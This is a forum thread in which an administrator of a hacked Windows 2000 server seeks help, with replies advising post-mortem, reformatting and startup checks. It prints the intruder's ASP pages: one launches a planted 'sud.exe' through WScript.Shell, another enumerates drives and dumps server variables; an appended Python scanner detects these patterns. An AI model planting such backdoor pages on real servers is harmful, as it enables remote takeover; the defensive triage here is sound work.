I've been hacked

Status
Not open for further replies.

sodax

Programmer
Jun 26, 2003
87
GB
Does somebody know how I can delete files from my server?

My server has been hacked by

ssijta :D

I tried to delete files which take up space on my disk, but I can't. I get a message "impossible to delete this file....". I restarted the server twice but nothing...

Can somebody help me?

thanks
 
Which Operating System are you using? And given the problem, it would be best to have it reformatted and the OS reinstalled. I hope you have backups.

----------------------------
"Will work for bandwidth" - Thinkgeek T-shirt
 
I'm using Windows 2000 Server.
I have backups, but the reformat solution is the last choice for me; if I find no solution to my problem I will do it.

But I would prefer a solution other than formatting the drives.
 
What are the files that you are trying to delete? Could they be system files?

Check the Task Manager for any dependent processes, then kill them.

Try running Spybot or something to see if there is a hidden dependent.

Iain
 
The files are not system files, but I will try to follow your suggestions.

I have already tried to search for a solution.

What I found is a message:
"Hacking a pub tut by Skkwiddly. Wa2001"

Does somebody know it?
Does anybody know this hacker?

bye
 
Reformat should always be something you do once you have done the post-mortem. It is SOP for an incident like this. The reason is that you can never be totally sure what happened to the OS. However, in the interest of post-mortem:
I'd be careful with the sites you find ...

----------------------------
"Will work for bandwidth" - Thinkgeek T-shirt
 
Sodax

Have you tried to manage these undeletable items from safe mode? It may be a service/driver/network connection that won't let go in normal boot up but will not load or cannot connect in safe mode. Press "F8" as soon as Windows starts to load, immediately after system POST; a startup menu will be presented, choose safe mode. Often I have also been able to find problematic programs running on the box using the MSINFO32 tool in the section "software environment\startup programs". These applications will many times launch from the registry run keys. Anything unfamiliar can be commented out with a ; in front of the value in the registry for testing, then removed or restored later.
 
Thanks for your message. OK, I can't use F8 because I'm using Terminal Server, so I can't start in safe mode.

But I got more information about it. I saw a page made by the hacker
showing this information:
backgate KIT (category :win ; known as:NT.hack)
"sud.exe" is created or running
Do you know it?

bye and thanks a lot for your help


<%
CreateObject("WScript.Shell").Run("c:\Inetpub\iissamples\sdk\asp\applications\help\asp\win\sud.exe")
%>
<h1>Yes, you made it!! Good job dude!<\h1></h1>


____________________________________________________________

<HTML>
<HEAD>
<TITLE> Hacking a pub tut by Skkwiddly. Wa2001 </TITLE>
<META NAME="description" CONTENT="ThE HiDeOuT, InC.(we are watching you!!!)">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
</HEAD>

<BODY bgcolor="#FBFEFC" link="#2A75B9" vlink="#2A75B9" alink="#990099">
<%
CreateObject("WScript.Shell").Run("c:\Inetpub\iissamples\sdk\asp\applications\help\asp\win\sud.exe")
%>
<%

%>
<table width="750" border="0">
<tr>
<td width="250" valign="top">
<p><b> <font size="-1">Server Date: <% =date() %> <br>
Server Time: <%=time() %><br>
Server address: <%=request.servervariables("LOCAL_ADDR")%> <br>
Server Software: <%=request.servervariables("SERVER_SOFTWARE")%> <br></font></b> </p>
</td>
<td colspan="2">&nbsp;</td>
</tr>
</table>

<%
DIM fs, d, dc, s, n, sp
Set fs=Server.Createobject("Scripting.FileSystemObject")
Set dc=fs.drives
%>
<table border="0" width="750">
<tr bgcolor="#548596">
<td>
<div align="center"><font color="#FBFEFC"><b>Letter</b></font></div>
</td>
<td>
<div align="center"><font color="#FBFEFC"><b>Drive Type</b></font></div>
</td>
<td>
<div align="center"><font color="#FBFEFC"><b>Volume Name</b></font></div>
</td>
<td>
<div align="center"><font color="#FBFEFC"><b>File system</b></font></div>
</td>
<td>
<div align="center"><font color="#FBFEFC"><b>Free space</b></font></div>
</td>
<td>
<div align="center"><font color="#FBFEFC"><b>Total size</b></font></div>
</td>
</tr>
<%
back1="#D3E2E7"
back2="#AFFEDE"
back=back2
FOR EACH d IN dc
IF (back=back2) THEN
back=back1
ELSE
back=back2
END IF

%>
<tr bgcolor=<%=back%>>
<td>
<div align="center"><b> <%=d.driveletter%> </b></div>
</td>
<td>
<div align="center"><b> <%
IF d.DriveType = 0 Then
s = "Unknown"
IF d.VolumeName = "" Then
n = "&nbsp;"
Else
n = d.VolumeName
END IF
ELSEIF d.drivetype=1 THEN
s="Removable"
IF d.isready THEN
n=d.volumename
ELSE
n="--"
END IF
ELSEIF d.drivetype=2 THEN
s="Fixed"
IF d.isready THEN
n=d.volumename
ELSE
n="--"
END IF
ELSEIF d.drivetype=3 THEN
s="Network"
IF d.isready THEN
n=d.sharename
ELSE
n="--"
END IF
ELSEIF d.drivetype=4 THEN
s="CDROM"
IF d.isready THEN
n=d.volumename
ELSE
n="--"
END IF
ELSEIF d.drivetype=5 THEN
s="RAM Disk"
IF d.isready THEN
n=d.volumename
ELSE
n="--"
END IF
END IF
response.write(s)
%> </b></div>
</td>
<td><b> <%=n%> </b></td>
<td>
<div align="center"><b> <%
str=""

str=str & d.driveletter
str=str & ":"

'response.write(str)
IF d.isready THEN
set sp=fs.getdrive(str)
response.write(sp.filesystem)
ELSE
response.write("--")
END IF
%> </b></div>
</td>
<td>
<div align="right"><b> <%
str=""

str=str & d.driveletter
str=str & ":"

'response.write(str)
IF d.isready THEN
freespace = (d.AvailableSpace / 1048576)
set sp=fs.getdrive(str)
response.write(Round(freespace,1) & " MB")
ELSE
response.write("--")
END IF
%> </b></div>
</td>
<td>
<div align="right"><b> <%
str=""

str=str & d.driveletter
str=str & ":"

'response.write(str)
IF d.isready THEN
totalspace = (d.TotalSize / 1048576)
set sp=fs.getdrive(str)
response.write(Round(totalspace,1) & " MB")
ELSE
response.write("--")
END IF
%> </b></div>
</td>
</tr>
<%NEXT%>
</table>

<table width="750" border="0">
<tr>
<td>&nbsp;</td>
</tr>
<tr>
<td> <font size="-1"><%
for each thing in request.servervariables
tempvalue=request.servervariables(thing)
response.write thing & "=" & tempvalue & "<br>"
next
%> </font> </td>
</tr>
</table>
</BODY>
</HTML>
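
Added example, not part of the thread and not any poster's code: a Python triage sketch that scans an offline copy of the web root for the server-side behaviours visible in the two pages posted above (launching a program through `WScript.Shell`, enumerating drives through `Scripting.FileSystemObject`, dumping `request.servervariables`). The function names, rule names and the extension list are assumptions made for this example.

```python
import os
import re

ASP_BLOCK = re.compile(r"<%(.*?)%>", re.S)  # server-side script only, not page text
RULES = {  # behaviours of the two posted pages; VBScript is case-insensitive
    "shell-exec": re.compile(r'CreateObject\(\s*"WScript\.Shell"\s*\)', re.I),
    "drive-enum": re.compile(r'Scripting\.FileSystemObject.*?\.\s*drives\b', re.I | re.S),
    "servervars-dump": re.compile(r'for\s+each\s+\w+\s+in\s+request\.servervariables', re.I),
}
# Quoted string literals inside script blocks that name an executable.
EXE_LITERAL = re.compile(r'"([^"\r\n]+\.(?:exe|com|bat|cmd|scr))"', re.I)

# Script block of the first page posted above.
POSTED_PAGE = r'''<%
CreateObject("WScript.Shell").Run("c:\Inetpub\iissamples\sdk\asp\applications\help\asp\win\sud.exe")
%>'''
# Constructed benign page: the same strings appear only as visible text.
BENIGN_PAGE = '<p>Time: <%=time() %></p><p>Notes on "WScript.Shell" and "setup.exe"</p>'


def scan_asp(text):
    """Return (rule names hit, executable paths quoted) for one ASP source."""
    code = "\n".join(ASP_BLOCK.findall(text))
    hits = sorted(name for name, rx in RULES.items() if rx.search(code))
    return hits, sorted(set(EXE_LITERAL.findall(code)))


def scan_tree(root, exts=(".asp", ".asa")):  # extension list is an assumption
    """Walk an offline copy of the web root; report script files with any hit."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="latin-1") as fh:
                    hits, exes = scan_asp(fh.read())
                if hits:
                    report[path] = (hits, exes)
    return report


if __name__ == "__main__":
    print(scan_asp(POSTED_PAGE))
    print(scan_asp(BENIGN_PAGE))
```

Every executable path the scan reports is a file to preserve and hash before any cleanup, and the hits are leads for the post-mortem rather than proof that a file is malicious.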
 